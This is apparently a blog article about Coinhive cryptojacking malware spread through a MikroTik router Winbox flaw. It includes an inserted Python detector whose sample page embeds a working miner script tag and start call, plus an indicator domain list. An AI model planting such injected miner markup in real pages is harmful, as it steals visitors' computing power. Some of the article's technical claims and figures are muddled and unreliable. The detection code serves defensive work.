200,000 MikroTik Routers infected with Crypto Mining Malware

MikroTik vulnerable routers

Over 200,000 internet routers made by the Latvian company MikroTik were infected with crypto-mining software called Coinhive, which makes the compromised device mine cryptocurrency for the hacker behind the attack.

Latvian Company MikroTik’s Routers Were Infected by Malware

MikroTik is a Latvian network hardware provider whose internet modems and routers have been in use across the globe since 1996. The company routinely updates its devices to keep up with modern standards, but with its latest update, cybercriminals found several vulnerabilities in the hardware and decided to exploit them for crypto mining.
The problem they found was the inability to detect zero-day malware, which could lead to several kinds of privacy invasion, including crypto mining and using the router as a listening device.

Several security firms discovered the breach inside MikroTik routers: the malware spread across the routers and infected them with code that delivered Coinhive’s crypto-mining software through the devices.

The Origin of Coinhive, the Reason behind the MikroTik Router Breach

Coinhive is a cryptocurrency mining service that runs across many devices thanks to a piece of code that can be embedded in websites. The service takes its cues from the browsers of those devices through Coinhive’s JavaScript and uses their computing power to mine the Monero cryptocurrency for the attackers.

The opening left by the latest software update of MikroTik routers let the hackers secretly install cryptocurrency mining malware on such devices that were connected to the internet and in use. This latest breach of security in MikroTik’s routers has infected more than 200,000 routers, and the number is still increasing.

Since the discovery of the vulnerability in the routers, a new patch has fixed the flaw, and things have since gone back to normal. Security firms detected the flaw through the Winbox component of MikroTik routers. However, the number of infections kept increasing because many users did not update their router’s software to the latest patch, as many were unaware of this latest invasion of privacy.

The Workings of the CoinHive Bug in the MikroTik Routers

This bug in MikroTik’s latest update let the malware attacker gain unauthenticated remote access to any of the company’s routers that had not been updated to the newest patch, then use it to mine Monero cryptocurrency without the owner’s consent, reducing the internet connection’s ability to perform at full capacity. This is why the number of breached routers is still increasing.

It was all discovered by security researchers at Trustwave in Brazil, and so far the crypto-mining attackers have compromised as many as 183,700 unpatched MikroTik routers. This is not the story of a single country: because of the popularity and far reach of these routers, other hackers have been encouraged to build their own crypto-mining malware to exploit the unpatched MikroTik router bug in other countries as well. More than 25,000 of the infected routers were located in Moldova, where the same CoinHive crypto-mining software was used.

If you are wondering how the CoinHive malware works, here is the answer according to cybersecurity expert Simon Kenin: “The attacker created a custom error page with the CoinHive script in it” and “if a user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker.”

It is worth mentioning that the hackers behind the CoinHive malware can infect a large number of routers at once, which is far more effective than targeting small websites one at a time or using other complicated channels to place malicious JavaScript on computers to mine coins.
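As an added example that is not part of the original article, here is a small Python check a defender can run on the HTML of an error page fetched through a suspect router: it flags an external script loaded from a domain that historically served the Coinhive miner, and an inline call that starts the miner. The sample error page, the indicator domain list and the site key are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Illustrative indicator list: domains that historically served the Coinhive
# script. Extend it with your own threat intelligence.
COINHIVE_DOMAINS = ("coinhive.com", "coin-hive.com")

class _ScriptCollector(HTMLParser):
    """Collect external <script src> values and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def find_coinhive_injection(html):
    """Return a list of findings explaining why the page looks miner-injected."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.srcs:
        # Strip scheme and leading slashes to get the host of the script URL.
        host = re.sub(r"^[a-z]+:", "", src).lstrip("/").split("/")[0].lower()
        if any(host == d or host.endswith("." + d) for d in COINHIVE_DOMAINS):
            findings.append(f"external miner script: {src}")
    for body in p.inline:
        m = re.search(r"CoinHive\.Anonymous\(\s*['\"]([^'\"]+)['\"]", body)
        if m:
            findings.append(f"inline miner start with site key {m.group(1)}")
    return findings

# Constructed sample: what a browser receives when the router replaces a real
# 404 with the attacker's custom error page (site key is a placeholder).
INJECTED_ERROR_PAGE = """<html><head><title>404 Not Found</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLEKEY000');miner.start();</script>
</head><body>Error</body></html>"""
CLEAN_ERROR_PAGE = "<html><head><title>404 Not Found</title></head><body>Not found</body></html>"
```

Fetch a deliberately nonexistent URL through the router and pass the response body to `find_coinhive_injection`; an empty list means no miner markers were found.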

Several Ways to Fix MikroTik Routers’ Firmware Vulnerabilities

Making mistakes is a big part of life, and we evolve over time by learning from those mistakes, which is what defines our human nature at its core.

MikroTik surely deserves the blame for the slip in its security that let hackers breach the firmware and use it to mine crypto coins. However, once it issued the patch and notified users of the issue, the blame shifted to the users who did little to solve a simple problem.

If you are puzzled and don’t know how to fix the issue, follow the guidelines below:

  • Connect to the MikroTik router from the internal network, using WinBox or other utilities such as TELNET or SSH;
  • Use different ports to connect to the router, such as TCP/10023 for TELNET and TCP/10022 for SSH, which are not accessible to the attacker;
  • Contact the support staff of your local ISP and see whether they have a solution for the crypto mining and slow browsing issue;
  • If the connection still shows visible problems and you are still unable to use your internet connection freely, there is one more thing you can do: reset the MikroTik router to its factory settings. Note that the Wi-Fi name and the existing password of the connection will also revert to the defaults.

Once you reset the router, before reconnecting all your devices, attach a single machine through an Ethernet cable, open the router’s IP address, and immediately update its firmware to the latest version.

Safety Starts from our Vigilance – Final Thoughts on the MikroTik Malware Breach

Router manufacturers will do their best to resolve issues with their products, such as the CoinHive malware infiltration of MikroTik’s firmware, because such issues are bad for business. However, we have to take note of any sudden abnormalities in our devices and internet connections and check for notifications and updates more often.

Such vigilance will beat the malware attackers at their own game, and you will never fall victim to such an invasive crypto-mining scam again.

About the author
Julie Splinters
Julie Splinters - VPN service analyst

Julie Splinters is a VPN service analyst at Reviewedbypro.com, who specializes in VPN services and anti-spyware applications. Her major of English Philology and her passion for IT helped her choose the path of an IT writer.
